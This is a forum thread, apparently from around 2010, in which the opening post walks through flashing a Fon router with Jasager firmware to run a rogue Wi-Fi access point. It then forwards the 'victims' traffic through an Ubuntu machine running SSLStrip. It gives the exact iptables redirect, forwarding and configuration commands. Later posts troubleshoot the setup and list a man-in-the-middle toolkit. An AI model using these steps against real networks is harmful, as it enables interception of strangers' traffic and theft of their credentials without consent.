Netshroud Posted December 30, 2009 Share Posted December 30, 2009 (edited) (I'm unsure as how how Step 1 works on a virgin Fon 2100. If it doesn't work, try the downgrading and patching to enabled redboot as mentioned in Darren's guide.) Part 1: Flashing the Fon+ The first step to installing Jasager is to flash the Fon with the Jasager firmware, which can be found at Digininja’s site. (http://www.digininja.org/files/jasager_firmware_1.0.tar.bz2) To simplify the process, I’ll be using the nifty "Fon Flash" application at http://www.gargoyle-router.com/download.php For some reason the Windows version failed to work for me (it was complaining about ARP sizes), so I used the Linux version off an Ubuntu 9.04 LiveCD. I haven’t tried the Windows version on anything other than Vista SP2 Business x64, so if it works for you, enjoy. Untar the Jasager firmware to the directory of your choice, as well as the Fon Flash utility. For some reason Fon Flash failed to launch when I ran it from a Windows share, so I copied it to the desktop. Next, run Fon Flash. If it complains about not finding interfaces, give it your password to sudo itself. Under Windows Vista/7, you probably need to run it with elevated privileges. Make sure that the firmware type is set to "OpenWrt / Gargoyle", and select your Ethernet interface (if you have multiple ones, the one connected to the Fon). Point the Rootfs file to openwrt-atheros-root.squashfs, and the Kernel file to openwrt-atheros-xmlinux.lzma. Next, open up a terminal. Make sure that your Ethernet interface is set to 192.168.0.254. Connect your system to the Fon’s LAN port via Ethernet. Disable any network manager you may have running. For Ubuntu, right-click on the network notification icon and uncheck "Enable Networking". Switch back to the Fon Flash utility, and click "Flash Router Now!" Plug in the power to your Fon (or restart it), sit back and wait until you see the "Device flashed successfully" notification. This took about 15 minutes for me so go for a walk, read a book, or chat in #hakhouse. Part 2: Configuring the Fon and network Once the Fon is flashed, set your computer to an ip on the 192.168.1.0/24 range. Telnet into the Fon on 192.168.1.1. Run ‘passwd’ to set the root password, then disconnect. SSH into the Fon. Accept the host key, and log in as root with your new password. First, you need to enable the wireless. The following commands will do this: uci set wireless.wifi0.disabled=0 uci commit wireless && wifi Next, pick an IP range and IP Address for the Fon. I chose to use one on the private range 172.16-32.X.Y range, because my home network is on the 10. range, and a couple of places I want to demo it at use 192.168. Execute the following commands to do as I did, and set the Fon to 172.20.0.2: uci set network.lan.ipaddr=172.20.0.2 uci set network.lan.gateway=172.20.0.1 uci set network.lan.dns=10.10.0.1 uci commit network (10.10.0.1 is my home router) Also configure dnsmasq to give out the gateway IP and DNS servers. In /etc/config/dhcp, under the section config dhcp lan, add: list 'dhcp_option' '3,172.20.0.1' list 'dhcp_option' '6,10.10.0.1' Reboot the fon (The command via ssh is 'reboot'). Change your IP to be on the Fon’s range, then SSH into its new IP address. Accept the host key. Now we need to set up Internet access on the Fon. When running Jasager, your network setup will/should look like this: Internet --> Router --> Computer --> Fon --> Victims We need to configure the computer to share its internet connection with the Fon. Under Windows, just enable Internet Connection Sharing. Under Linux, execute: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE where eth0 is your internet-facing interface. If you’re doing what I did, and using a Virtual Machine for Jasager, you need to give it 2 virtual interfaces. For VMware users, run vmnetcfg.exe (Found in C:\Program Files (x86)\VMware\VMware Workstation\ for me). Make sure that one vmnet is bridged to your internet interface, and one is bridged to your Ethernet/Fon interface. If you can now ping google.com from the Fon, move on. If not, make sure you have done everything correctly. Next, I had to edit /karma/www/cgi-bin/functions.rb on the Fon to bridge ath0 correctly. Unless you’re fluent in vi, I would recommend installing nano. opkg update opkg install libncurses nano In functions.rb, underneath: system("wlanconfig ath0 create wlandev wifi0 wlanmode master 2>&1 > /dev/null") add: system("sleep 1") system("brctl addif br-lan ath0") and replace: system("ifconfig", "ath0", "10.1.1.1", "up") with: system("ifconfig", "ath0", "up") Part 3 (Optional): Installing X-Wrt The main reason I need X-Wrt was that I couldn’t figure out how to change the time zone without it. To install X-Wrt, simply run: echo "src X-Wrt http://downloads.x-wrt.org/xwrt/kamikaze/8.09/atheros/packages" >> /etc/opkg.conf opkg update opkg install webif Part 4: Running Jasager Now connect over HTTP using your browser of choice to the Fon on port 1471. Log in with username "root" or "admin", and your root password. Click the big grey button, turn karma on, and wait for victims to get friendly with Jasager. This is the script I use to share the internet on the Ubuntu VM, and start SSLStrip: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo ifconfig eth1 172.20.0.1 netmask 255.255.255.0 sudo dhclient eth0 python sslstrip-0.7/sslstrip.py -l 64123 -f sslstrip-0.7/lock.ico Edited April 21, 2010 by Psychosis Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 17, 2010 Share Posted April 17, 2010 hi i used windows 7 with FonFlash and the first time nothing happened i tried in Ubuntu but did't get Fonflash working second tried in windows, he did it :D Device flashed successfully :D then i set my ip to 192.168.1.2 and reboot the fon tried to telnet with telnet and putty but both did't work and in Ipconfig the default gateway was empty so how can i fix this? thanks very much Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 17, 2010 Author Share Posted April 17, 2010 In ipconfig the default gateway would be empty if you didn't set one when you set a static IP. Can you ping 192.168.1.1? Does it show up on a NMAP ping sweep? Can you post a screenshot of your IP configuration? Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 18, 2010 Share Posted April 18, 2010 ping scan : time out the namp scan says 0 host up and here is a screen dump form my settings settings Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 18, 2010 Author Share Posted April 18, 2010 Wierd. Is the power on and the network cable connected properly? Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 18, 2010 Share Posted April 18, 2010 (edited) lol yes he has power and the kabel is as secure as can be but for the record the only thing i did with this Fon is flash the Atheros chip thas step 1 in your guide and step 11* in the jasager guide so OpenWRT is not installed on the fon so wouldn't it be impossible to telnet to the fon ? *i have a Fon 2201 firmware 1.1.1 Rc2 and i asked the forum how i should handle, they said i could start at step 11 of the jasager guide so i did but step 11 is the same as your step 1 and thats flashing the atheros chip or something step 12 is telnet over to the fon Edited April 18, 2010 by GuyDols Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 18, 2010 Author Share Posted April 18, 2010 Flashing it is installing OpenWRT (and Jasager and it's dependencies). As ridiculous as it may sound, try flashing it again. I had a similar issue, and reflashing it fixed it. Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 18, 2010 Share Posted April 18, 2010 oke i will now retry it i will post when i'm done Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 18, 2010 Share Posted April 18, 2010 i flashed successfuly but can't telnet into it i did an nmap range scan the only ip up is me :( Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 18, 2010 Share Posted April 18, 2010 i found out that when i start pinging and then plug the power in i get like 4 packets back and then it´s dead again tried telnet and ssh but i can get in to reboot with telnet on port 9000 do you know maby witch port i can test to tried flashing it 3 times Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 18, 2010 Author Share Posted April 18, 2010 Run a ping scan on 192.168.0.0/16, 10.0.0.0/8, and 172.16.0.0/12, see if it shows up at all. (Remember to change your IP to be on the subnet you're scanning.) Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 19, 2010 Share Posted April 19, 2010 i did all the scan it took forever and did't find anything but when i don't assign an ip i get this ip from the Fon 169.254.63.223 255.255.0.0 so i though i couldn't hurt if i scanned that subnet and that's wath i'm now doing i let you know when i find something Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 19, 2010 Author Share Posted April 19, 2010 That's not an IP address you would get from the Fon, that's an autoconfiguration IP. Your OS would have assigned you that IP when it didn't get one from the fon. Which leaves me confused. Is the image you flashed corrupt in any way? Are the lights on the fon flickering? Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 19, 2010 Share Posted April 19, 2010 when i plug the power in the power, internet and computer lights go on wireless not after 1 sec internet and computer go off then after 2 sec the internet starts flickering then after 10 sec power and internet go off and then internet starts flickering but power light is off Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 19, 2010 Share Posted April 19, 2010 maby you cuold email me the image that you that 100% works Guy_dols@hotmail.com ty Quote Link to comment Share on other sites More sharing options...
gaud Posted April 19, 2010 Share Posted April 19, 2010 What is the MITM Fun VM you have, it sounds... fun :-) Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 19, 2010 Author Share Posted April 19, 2010 maby you cuold email me the image that you that 100% works Guy_dols@hotmail.com ty Just download it from http://www.digininja.org/jasager Does anything work if you use the standard OpenWRT Kamikaze firmare? http://downloads.openwrt.org/kamikaze/8.09/atheros/ What is the MITM Fun VM you have, it sounds... fun :-) It's the VM I use for MITM attacks (on other VMs). It's running Ubuntu 9.10, and has dsniff, wireshark, sslstrip, SET, middler (which I used once to have a look at), metasploit and a non-functional upside-down-ternet (current project). Quote Link to comment Share on other sites More sharing options...
cooler Posted April 20, 2010 Share Posted April 20, 2010 (edited) Thanks for the guide, I followed your guide and everything worked fine, accept I've ran in to a strange problem. There is no internet connection for the connected clients. When I ping google from fon, it reaches fine and when I ping google from connected clients it also reaches, but when opening any broswer no connection can be established. Using win7. Whats could be the problem and how could I fix it? P.S my internal ip for fon and pc is 192.168.1.1 range and my router and wlan0 is 192.168.120.1 range, and also using wlan0 substituted for eth0. Edited April 20, 2010 by cooler Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 20, 2010 Author Share Posted April 20, 2010 Is Windows 7 the ICS host / MITM, or the connected client / 'victim'? If it's the 'victim', what do you have running the ICS machine? Quote Link to comment Share on other sites More sharing options...
cooler Posted April 20, 2010 Share Posted April 20, 2010 Is Windows 7 the ICS host / MITM, or the connected client / 'victim'? If it's the 'victim', what do you have running the ICS machine? Hi, My ICS Machine is Ubuntu 8.10, the clients are running windows 7 On linux side I have ath0 with static ip connected to fon. Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 20, 2010 Author Share Posted April 20, 2010 If you're not running SSLStrip (on port 64123), then: sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 will cause all TCP traffic on port 80 (usually HTTP) to just get dropped. Run: sudo iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 to remove that rule. Quote Link to comment Share on other sites More sharing options...
gaud Posted April 20, 2010 Share Posted April 20, 2010 I'd be interested to see your progress on the upside down. It is on my list of things to play with. Quote Link to comment Share on other sites More sharing options...
Netshroud Posted April 20, 2010 Author Share Posted April 20, 2010 My progress is: Everything should work. Nothing does. I'm confused. Quote Link to comment Share on other sites More sharing options...
cooler Posted April 20, 2010 Share Posted April 20, 2010 If you're not running SSLStrip (on port 64123), then: sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 will cause all TCP traffic on port 80 (usually HTTP) to just get dropped. Run: sudo iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 to remove that rule. The above makes no difference, I've tried cross over cable too still no joy Quote Link to comment Share on other sites More sharing options...
John Doeeee Posted April 20, 2010 Share Posted April 20, 2010 http://www.digininja.org/jasager[/url] Does anything work if you use the standard OpenWRT Kamikaze firmare? http://downloads.openwrt.org/kamikaze/8.09/atheros/ i tried both but no telnet :( and just for the record the WiFi light never flashes and it doesn't send out ssid anymore Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.